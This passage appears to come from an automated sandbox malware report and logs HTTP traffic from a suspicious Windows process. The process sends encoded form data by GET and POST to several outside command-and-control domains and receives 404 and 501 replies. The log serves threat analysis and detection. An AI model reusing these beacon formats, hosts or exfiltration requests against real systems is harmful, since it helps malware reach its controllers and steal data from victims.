                                                                    Data Raw: 4b 78 5a 3d 64 75 54 39 51 54 4f 2b 39 35 78 65 38 69 54 6e 37 4d 51 75 6b 49 6c 39 57 62 70 7a 34 65 4d 62 30 49 41 53 78 38 7a 6f 69 66 6e 4e 73 47 42 2b 56 34 41 51 32 64 41 72 62 57 70 51 64 39 48 57 6e 2f 6e 78 45 37 75 46 62 4c 46 71 62 4e 4d 6f 44 41 4c 66 6a 50 46 35 33 34 46 6f 45 4c 2b 58 75 31 76 72 52 76 70 2b 51 58 38 43 38 73 4d 39 53 77 53 6a 47 73 66 6c 76 66 51 43 75 4f 31 47 65 4a 47 67 75 62 77 6d 54 59 71 70 78 52 6d 59 6c 55 32 6f 41 72 41 41 69 36 2f 66 67 34 38 30 76 76 45 6f 58 4e 71 62 49 54 58 49 31 68 4f 66 48 76 4d 41 73 52 4b 52 30 63 6e 64 75 4f 43 2b 31 4f 31 4c 73 6a 41 49 71 4f 33 65 6c 65 51 35 72 66 79 61 69 6d 70 31 32 4c 7a 4c 7a 62 2f 51 36 4a 38 54 64 70 38 78 4e 6f 39 55 43 71 69 51 67 51 48 68 38 6b 31 61 7a 77 70 36 43 34 43 76 66 44 57 64 67 35 72 5a 59 58 53 47 39 55 42 54 73 6a 33 6c 71 67 57 6c 59 36 33 77 72 50 2b 57 35 70 63 54 6a 74 50 43 4d 37 39 58 6f 65 4e 67 43 75 75 37 2f 56 6b 45 77 2f 2b 78 54 68 39 33 72 6f 56 36 68 56 32 58 4f 49 67 54 77 69 [TRUNCATED]
                                                                    Data Ascii: KxZ=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 [TRUNCATED]
                                                                    Dec 6, 2024 10:06:10.392932892 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Fri, 06 Dec 2024 09:06:10 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 548
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    8 | 192.168.2.6 | 49962 | 206.238.89.119 | 80 | 5000 | C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 6, 2024 10:06:11.637531042 CET | 590 | OUT | GET /2mep/?T2M=Y0Z0G&KxZ=Qs7dTkG74ZlbzDPIks80sLprU65g+bEtyeoxhvOotfrZ9WhcV54Y9rQsYH5lTs77muDKHbL5HIFuHfk3BCfdk/wMyoJJMo2d1H/wS+I5dkctw90/UWWKH7Hql+RyzctUTqPRuvs= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.127358.win
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Dec 6, 2024 10:06:13.136332989 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Fri, 06 Dec 2024 09:06:12 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 548
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    9 | 192.168.2.6 | 49977 | 66.29.149.46 | 80 | 5000 | C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 6, 2024 10:06:18.690048933 CET | 866 | OUT | POST /cnve/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.infohive.website
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 208
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.infohive.website
                                                                    Referer: http://www.infohive.website/cnve/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 37 58 72 79 54 6f 73 31 30 52 71 57 6b 44 64 5a 65 30 37 36 5a 34 74 2b 51 70 44 6b 59 63 36 44 6a 72 36 32 49 56 4d 38 76 69 48 37 67 5a 51 52 52 57 52 53 54 66 65 4e 4d 52 68 55 61 58 48 6b 61 63 41 64 6f 6e 47 74 4a 76 56 61 36 73 4a 57 63 38 42 51 46 58 77 74 56 31 61 57 31 74 50 57 64 61 6f 39 4a 52 42 76 74 74 46 56 50 53 35 56 72 6e 65 76 6d 39 46 73 55 75 58 2b 78 62 33 76 69 6b 62 62 54 64 69 7a 31 6f 6b 71 4e 6e 76 68 58 76 4f 71 4e 51 55 52 4f 61 65 65 47 42 7a 33 4d 61 50 52 7a 76 4e 7a 30 46 57 34 72 65 49 65 75 37 67 75 53 73 4a 6f 57 41 43 76 57 74 56 5a 6b 78 45 34 36 76 51 39 30 42 6f 45
                                                                    Data Ascii: KxZ=7XryTos10RqWkDdZe076Z4t+QpDkYc6Djr62IVM8viH7gZQRRWRSTfeNMRhUaXHkacAdonGtJvVa6sJWc8BQFXwtV1aW1tPWdao9JRBvttFVPS5Vrnevm9FsUuX+xb3vikbbTdiz1okqNnvhXvOqNQUROaeeGBz3MaPRzvNz0FW4reIeu7guSsJoWACvWtVZkxE46vQ90BoE
                                                                    Dec 6, 2024 10:06:19.912571907 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Fri, 06 Dec 2024 09:06:19 GMT
                                                                    Server: Apache
                                                                    Content-Length: 493
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    10 | 192.168.2.6 | 49985 | 66.29.149.46 | 80 | 5000 | C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 6, 2024 10:06:21.360471964 CET | 890 | OUT | POST /cnve/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.infohive.website
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 232
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.infohive.website
                                                                    Referer: http://www.infohive.website/cnve/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 37 58 72 79 54 6f 73 31 30 52 71 57 6e 6a 74 5a 4e 44 6e 36 53 34 74 78 56 70 44 6b 52 38 37 49 6a 72 2b 32 49 55 35 6b 73 51 54 37 6e 37 49 52 51 54 39 53 55 66 65 4e 55 42 68 56 48 48 48 5a 61 63 4d 56 6f 6d 71 74 4a 76 42 61 36 70 74 57 63 50 35 50 58 33 77 76 64 56 61 55 2f 4e 50 57 64 61 6f 39 4a 52 56 4a 74 72 74 56 50 69 70 56 6b 6d 65 73 6c 39 46 6a 43 2b 58 2b 6d 72 33 6a 69 6b 61 4d 54 63 2f 6f 31 72 63 71 4e 6d 66 68 58 39 6d 70 44 51 56 59 54 4b 66 58 4f 55 43 64 50 4a 43 48 74 75 30 66 6f 6e 6e 54 6a 49 56 45 79 49 67 4e 41 38 70 71 57 43 61 64 57 4e 56 7a 6d 78 38 34 6f 34 63 61 37 31 4e 6e 68 4a 65 50 36 4b 37 42 37 4d 57 4d 46 77 5a 65 70 61 74 72 54 51 3d 3d
                                                                    Data Ascii: KxZ=7XryTos10RqWnjtZNDn6S4txVpDkR87Ijr+2IU5ksQT7n7IRQT9SUfeNUBhVHHHZacMVomqtJvBa6ptWcP5PX3wvdVaU/NPWdao9JRVJtrtVPipVkmesl9FjC+X+mr3jikaMTc/o1rcqNmfhX9mpDQVYTKfXOUCdPJCHtu0fonnTjIVEyIgNA8pqWCadWNVzmx84o4ca71NnhJeP6K7B7MWMFwZepatrTQ==
                                                                    Dec 6, 2024 10:06:22.579344988 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Fri, 06 Dec 2024 09:06:22 GMT
                                                                    Server: Apache
                                                                    Content-Length: 493
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    11 | 192.168.2.6 | 49993 | 66.29.149.46 | 80 | 5000 | C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 6, 2024 10:06:24.015970945 CET | 1903 | OUT | POST /cnve/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.infohive.website
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 1244
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.infohive.website
                                                                    Referer: http://www.infohive.website/cnve/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 37 58 72 79 54 6f 73 31 30 52 71 57 6e 6a 74 5a 4e 44 6e 36 53 34 74 78 56 70 44 6b 52 38 37 49 6a 72 2b 32 49 55 35 6b 73 51 72 37 6e 49 41 52 52 77 6c 53 56 66 65 4e 4b 52 68 51 48 48 48 2b 61 66 38 52 6f 6e 58 61 4a 73 35 61 31 76 68 57 56 61 56 50 64 33 77 76 52 31 61 56 31 74 50 35 64 61 59 35 4a 52 46 4a 74 72 74 56 50 67 42 56 6a 33 65 73 6a 39 46 73 55 75 58 49 78 62 32 2b 69 6b 54 35 54 66 54 34 31 62 38 71 4f 46 33 68 57 4f 4f 70 50 51 56 57 51 4b 66 50 4f 55 47 47 50 4a 65 44 74 75 52 43 6f 6e 44 54 7a 4a 67 49 33 34 6f 4b 64 4e 52 30 50 69 4b 2b 61 34 68 34 6e 54 34 49 73 4a 41 56 77 47 52 76 34 76 4f 4a 78 38 43 37 7a 66 32 42 4c 48 41 5a 73 62 67 6e 48 4a 54 77 51 57 6b 2b 4a 6d 63 50 6b 51 50 77 32 39 48 78 46 38 36 38 67 6b 76 63 47 77 4d 62 6d 74 49 75 68 6c 64 4a 79 32 4c 73 44 6a 5a 55 6d 42 6f 66 78 43 33 4a 48 48 4e 70 53 6d 72 67 69 72 33 49 32 66 52 37 6c 34 57 77 4b 77 41 61 56 42 4d 35 77 44 43 74 32 62 30 62 79 53 4f 2f 50 39 77 62 78 45 4e 4a 30 70 65 61 46 62 [TRUNCATED]
                                                                    Data Ascii: KxZ=... [TRUNCATED]
                                                                    Dec 6, 2024 10:06:25.230676889 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Fri, 06 Dec 2024 09:06:25 GMT
                                                                    Server: Apache
                                                                    Content-Length: 493
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    12 | 192.168.2.6 | 49999 | 66.29.149.46 | 80 | 5000 | C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 6, 2024 10:06:26.670553923 CET | 596 | OUT | GET /cnve/?KxZ=2VDSQdlG5RaW3hcOSzrtXrxDd4bhZ8b1rLrGGnoiqQrQ5oU7TABHb8GSGDxsLG7YK+gXk2baIuNiiMBLfcdVY2k1UguS5MLScqsLEwQyiaZDJDNhiwSLktxebIPhr8mPgUz4eag=&T2M=Y0Z0G HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.infohive.website
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Dec 6, 2024 10:06:27.894550085 CET | 652 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Fri, 06 Dec 2024 09:06:27 GMT
                                                                    Server: Apache
                                                                    Content-Length: 493
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    13 | 192.168.2.6 | 50016 | 217.70.184.50 | 80 | 5000 | C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Dec 6, 2024 10:06:33.789685965 CET | 854 | OUT | POST /ead0/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.sunnyz.store
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 208
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.sunnyz.store
                                                                    Referer: http://www.sunnyz.store/ead0/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 44 79 50 79 68 6d 53 79 6c 67 74 6d 48 6d 61 55 71 57 6f 30 34 54 78 55 45 43 33 78 4a 36 45 6b 77 79 34 74 6a 79 43 73 48 4d 71 76 4c 41 6b 57 34 47 56 6c 2f 50 76 65 36 2b 57 38 75 55 51 48 36 47 6c 66 7a 42 36 31 39 39 41 58 63 36 69 67 78 53 2f 76 6b 38 6d 75 74 5a 55 6c 55 54 4b 68 67 58 42 35 4e 42 53 78 33 59 35 2f 6f 51 47 34 70 73 2f 46 37 57 51 75 72 34 4a 47 72 70 49 47 37 67 66 57 55 78 4a 34 4d 65 78 49 65 43 52 32 64 4f 47 4d 2f 2f 51 67 43 6e 65 56 63 6c 30 6e 79 6b 69 6b 79 41 50 4e 46 38 58 68 48 58 4d 2b 57 71 64 45 5a 68 6a 5a 37 52 4b 34 6e 67 52 30 64 66 6b 49 70 71 42 72 36 56 63 42
                                                                    Data Ascii: KxZ=DyPyhmSylgtmHmaUqWo04TxUEC3xJ6Ekwy4tjyCsHMqvLAkW4GVl/Pve6+W8uUQH6GlfzB6199AXc6igxS/vk8mutZUlUTKhgXB5NBSx3Y5/oQG4ps/F7WQur4JGrpIG7gfWUxJ4MexIeCR2dOGM//QgCneVcl0nykikyAPNF8XhHXM+WqdEZhjZ7RK4ngR0dfkIpqBr6VcB
                                                                    Dec 6, 2024 10:06:35.015230894 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                                    Server: nginx
                                                                    Date: Fri, 06 Dec 2024 09:06:34 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
